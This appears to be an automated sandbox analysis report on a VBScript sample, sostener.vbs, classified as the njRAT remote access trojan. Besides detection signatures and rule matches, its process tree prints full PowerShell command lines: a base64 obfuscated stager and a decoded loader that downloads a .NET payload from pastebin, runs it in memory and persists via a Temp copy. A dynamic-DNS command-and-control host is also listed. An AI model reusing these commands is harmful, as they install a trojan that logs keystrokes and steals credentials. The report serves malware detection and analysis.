Edit tour
Windows
Analysis Report
sostener.vbs
Overview
General Information
| Sample name: | sostener.vbs |
| Analysis ID: | 1524755 |
| MD5: | 3ac2f2a9e0ea75fabc9cd17a6cfad0c5 |
| SHA1: | 918caec409f9a49bc055bbfb02d458c131724c83 |
| SHA256: | 48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559 |
| Tags: | asyncratvbsuser-lontze7 |
| Infos: |   |
 | |
Detection
Njrat
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Njrat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7520 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\soste ner.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7584 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ LoPuennnTe s = 'J?B4? Hc?cQB6?Hg ?I??9?C??J w?w?DM?Jw? 7?CQ?YgB4? HY?YwBy?C? ?PQ?g?Cc?J QBw?Ho?QQB j?E8?ZwBJ? G4?TQBy?CU ?Jw?7?Fs?U wB5?HM?d?B l?G0?LgBO? GU?d??u?FM ?ZQBy?HY?a QBj?GU?U?B v?Gk?bgB0? E0?YQBu?GE ?ZwBl?HI?X Q?6?Do?UwB l?HI?dgBl? HI?QwBl?HI ?d?Bp?GY?a QBj?GE?d?B l?FY?YQBs? Gk?Z?Bh?HQ ?aQBv?G4?Q wBh?Gw?b?B i?GE?YwBr? C??PQ?g?Hs ?J?B0?HI?d QBl?H0?OwB b?FM?eQBz? HQ?ZQBt?C4 ?TgBl?HQ?L gBT?GU?cgB 2?Gk?YwBl? F??bwBp?G4 ?d?BN?GE?b gBh?Gc?ZQB y?F0?Og?6? FM?ZQBj?HU ?cgBp?HQ?e QBQ?HI?bwB 0?G8?YwBv? Gw?I??9?C? ?WwBT?Hk?c wB0?GU?bQ? u?E4?ZQB0? C4?UwBl?GM ?dQBy?Gk?d ?B5?F??cgB v?HQ?bwBj? G8?b?BU?Hk ?c?Bl?F0?O g?6?FQ?b?B z?DE?Mg?7? Fs?QgB5?HQ ?ZQBb?F0?X Q?g?CQ?agB r?G8?cwBz? C??PQ?g?Fs ?cwB5?HM?d ?Bl?G0?LgB D?G8?bgB2? GU?cgB0?F0 ?Og?6?EY?c gBv?G0?QgB h?HM?ZQ?2? DQ?UwB0?HI ?aQBu?Gc?K ??g?Cg?TgB l?Hc?LQBP? GI?agBl?GM ?d??g?E4?Z QB0?C4?VwB l?GI?QwBs? Gk?ZQBu?HQ ?KQ?u?EQ?b wB3?G4?b?B v?GE?Z?BT? HQ?cgBp?G4 ?Zw?o?C??K ?BO?GU?dw? t?E8?YgBq? GU?YwB0?C? ?TgBl?HQ?L gBX?GU?YgB D?Gw?aQBl? G4?d??p?C4 ?R?Bv?Hc?b gBs?G8?YQB k?FM?d?By? Gk?bgBn?Cg ?JwBo?HQ?d ?Bw?Do?Lw? v?H??YQBz? HQ?ZQBi?Gk ?bg?u?GM?b wBt?C8?cgB h?Hc?LwBW? Dk?eQ?1?FE ?NQB2?HY?J w?p?C??KQ? g?Ck?OwBb? HM?eQBz?HQ ?ZQBt?C4?Q QBw?H??R?B v?G0?YQBp? G4?XQ?6?Do ?QwB1?HI?c gBl?G4?d?B E?G8?bQBh? Gk?bg?u?Ew ?bwBh?GQ?K ??k?Go?awB v?HM?cw?p? C4?RwBl?HQ ?V?B5?H??Z Q?o?Cc?V?B l?Gg?dQBs? GM?a?Bl?HM ?W?B4?Fg?e ?B4?C4?QwB s?GE?cwBz? DE?Jw?p?C4 ?RwBl?HQ?T QBl?HQ?a?B v?GQ?K??n? E0?cwBx?EI ?SQBi?Fk?J w?p?C4?SQB u?HY?bwBr? GU?K??k?G4 ?dQBs?Gw?L ??g?Fs?bwB i?Go?ZQBj? HQ?WwBd?F0 ?I??o?Cc?W ?B1?E0?TgB 1?FQ?a?Bp? C8?dwBh?HI ?LwBt?G8?Y w?u?G4?aQB i?GU?d?Bz? GE?c??v?C8 ?OgBz?H??d ?B0?Gg?Jw? g?Cw?I??k? GI?e?B2?GM ?cg?g?Cw?I ??n?F8?XwB f?Ek?bgB2? Gk?YwB0?HU ?cwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?LQ?t?C0 ?LQ?t?C0?L Q?n?Cw?I?? k?Hg?dwBx? Ho?e??s?C? ?Jw?x?Cc?L ??g?Cc?UgB v?GQ?YQ?n? C??KQ?p?Ds ?';$KByHL = [system. Text.Encod ing]::Unic ode.GetStr ing( [syst em.Convert ]::FromBas e64String( $LoPuennn Tes.replac e('?','A') ) );$KByH L = $KByHL .replace(' %pzAcOgInM r%', 'C:\U sers\user\ Desktop\so stener.vbs ');powersh ell $KByHL ; MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7592 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7740 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$xwqzx = '03';$bxvc r = 'C:\Us ers\user\D esktop\sos tener.vbs' ;[System.N et.Service PointManag er]::Serve rCertifica teValidati onCallback = {$true} ;[System.N et.Service PointManag er]::Secur ityProtoco l = [Syste m.Net.Secu rityProtoc olType]::T ls12;[Byte []] $jkoss = [system .Convert]: :FromBase6 4String( ( New-Object Net.WebCl ient).Down loadString ( (New-Obj ect Net.We bClient).D ownloadStr ing('http: //pastebin .com/raw/V 9y5Q5vv') ) );[syste m.AppDomai n]::Curren tDomain.Lo ad($jkoss) .GetType(' TehulchesX xXxx.Class 1').GetMet hod('MsqBI bY').Invok e($null, [ object[]] ('XuMNuThi /war/moc.n ibetsap//: sptth' , $ bxvcr , '_ __Invictus __________ __________ __________ __________ _-------', $xwqzx, ' 1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7844 cmdline:
powershell .exe Copy- Item 'C:\U sers\user\ Desktop\so stener.vbs ' -Destina tion 'C:\U sers\user\ AppData\Lo cal\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9) 
RegAsm.exe (PID: 7992 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- powershell.exe (PID: 8096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le hidden -command w script.exe //b //nol ogo 'C:\Us ers\user\A ppData\Loc al\Temp\so stener.vbs ' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 4412 cmdline:
"C:\Window s\system32 \wscript.e xe" //b // nologo C:\ Users\user \AppData\L ocal\Temp\ sostener.v bs MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7288 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ LoPuennnTe s = 'J?B4? Hc?cQB6?Hg ?I??9?C??J w?w?DM?Jw? 7?CQ?YgB4? HY?YwBy?C? ?PQ?g?Cc?J QBw?Ho?QQB j?E8?ZwBJ? G4?TQBy?CU ?Jw?7?Fs?U wB5?HM?d?B l?G0?LgBO? GU?d??u?FM ?ZQBy?HY?a QBj?GU?U?B v?Gk?bgB0? E0?YQBu?GE ?ZwBl?HI?X Q?6?Do?UwB l?HI?dgBl? HI?QwBl?HI ?d?Bp?GY?a QBj?GE?d?B l?FY?YQBs? Gk?Z?Bh?HQ ?aQBv?G4?Q wBh?Gw?b?B i?GE?YwBr? C??PQ?g?Hs ?J?B0?HI?d QBl?H0?OwB b?FM?eQBz? HQ?ZQBt?C4 ?TgBl?HQ?L gBT?GU?cgB 2?Gk?YwBl? F??bwBp?G4 ?d?BN?GE?b gBh?Gc?ZQB y?F0?Og?6? FM?ZQBj?HU ?cgBp?HQ?e QBQ?HI?bwB 0?G8?YwBv? Gw?I??9?C? ?WwBT?Hk?c wB0?GU?bQ? u?E4?ZQB0? C4?UwBl?GM ?dQBy?Gk?d ?B5?F??cgB v?HQ?bwBj? G8?b?BU?Hk ?c?Bl?F0?O g?6?FQ?b?B z?DE?Mg?7? Fs?QgB5?HQ ?ZQBb?F0?X Q?g?CQ?agB r?G8?cwBz? C??PQ?g?Fs ?cwB5?HM?d ?Bl?G0?LgB D?G8?bgB2? GU?cgB0?F0 ?Og?6?EY?c gBv?G0?QgB h?HM?ZQ?2? DQ?UwB0?HI ?aQBu?Gc?K ??g?Cg?TgB l?Hc?LQBP? GI?agBl?GM ?d??g?E4?Z QB0?C4?VwB l?GI?QwBs? Gk?ZQBu?HQ ?KQ?u?EQ?b wB3?G4?b?B v?GE?Z?BT? HQ?cgBp?G4 ?Zw?o?C??K ?BO?GU?dw? t?E8?YgBq? GU?YwB0?C? ?TgBl?HQ?L gBX?GU?YgB D?Gw?aQBl? G4?d??p?C4 ?R?Bv?Hc?b gBs?G8?YQB k?FM?d?By? Gk?bgBn?Cg ?JwBo?HQ?d ?Bw?Do?Lw? v?H??YQBz? HQ?ZQBi?Gk ?bg?u?GM?b wBt?C8?cgB h?Hc?LwBW? Dk?eQ?1?FE ?NQB2?HY?J w?p?C??KQ? g?Ck?OwBb? HM?eQBz?HQ ?ZQBt?C4?Q QBw?H??R?B v?G0?YQBp? G4?XQ?6?Do ?QwB1?HI?c gBl?G4?d?B E?G8?bQBh? Gk?bg?u?Ew ?bwBh?GQ?K ??k?Go?awB v?HM?cw?p? C4?RwBl?HQ ?V?B5?H??Z Q?o?Cc?V?B l?Gg?dQBs? GM?a?Bl?HM ?W?B4?Fg?e ?B4?C4?QwB s?GE?cwBz? DE?Jw?p?C4 ?RwBl?HQ?T QBl?HQ?a?B v?GQ?K??n? E0?cwBx?EI ?SQBi?Fk?J w?p?C4?SQB u?HY?bwBr? GU?K??k?G4 ?dQBs?Gw?L ??g?Fs?bwB i?Go?ZQBj? HQ?WwBd?F0 ?I??o?Cc?W ?B1?E0?TgB 1?FQ?a?Bp? C8?dwBh?HI ?LwBt?G8?Y w?u?G4?aQB i?GU?d?Bz? GE?c??v?C8 ?OgBz?H??d ?B0?Gg?Jw? g?Cw?I??k? GI?e?B2?GM ?cg?g?Cw?I ??n?F8?XwB f?Ek?bgB2? Gk?YwB0?HU ?cwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?LQ?t?C0 ?LQ?t?C0?L Q?n?Cw?I?? k?Hg?dwBx? Ho?e??s?C? ?Jw?x?Cc?L ??g?Cc?UgB v?GQ?YQ?n? C??KQ?p?Ds ?';$KByHL = [system. Text.Encod ing]::Unic ode.GetStr ing( [syst em.Convert ]::FromBas e64String( $LoPuennn Tes.replac e('?','A') ) );$KByH L = $KByHL .replace(' %pzAcOgInM r%', 'C:\U sers\user\ AppData\Lo cal\Temp\s ostener.vb s');powers hell $KByH L; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3196 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$xwqzx = '03';$bxvc r = 'C:\Us ers\user\A ppData\Loc al\Temp\so stener.vbs ';[System. Net.Servic ePointMana ger]::Serv erCertific ateValidat ionCallbac k = {$true };[System. Net.Servic ePointMana ger]::Secu rityProtoc ol = [Syst em.Net.Sec urityProto colType]:: Tls12;[Byt e[]] $jkos s = [syste m.Convert] ::FromBase 64String( (New-Objec t Net.WebC lient).Dow nloadStrin g( (New-Ob ject Net.W ebClient). DownloadSt ring('http ://pastebi n.com/raw/ V9y5Q5vv') ) );[syst em.AppDoma in]::Curre ntDomain.L oad($jkoss ).GetType( 'Tehulches XxXxx.Clas s1').GetMe thod('MsqB IbY').Invo ke($null, [object[]] ('XuMNuTh i/war/moc. nibetsap// :sptth' , $bxvcr , ' ___Invictu s_________ __________ __________ __________ __-------' , $xwqzx, '1', 'Roda ' ));" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5728 cmdline:
powershell .exe Copy- Item 'C:\U sers\user\ AppData\Lo cal\Temp\s ostener.vb s' -Destin ation 'C:\ Users\user \AppData\L ocal\Temp\ ' MD5: 04029E121A0CFA5991749937DD22A1D9) - RegAsm.exe (PID: 7540 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| NjRAT | RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored. |
{"Host": "sundsvall00020.duckdns.org", "Port": "3737", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "30e36121f3f1488e82"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| Click to see the 15 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
| |
| MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
| Click to see the 17 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||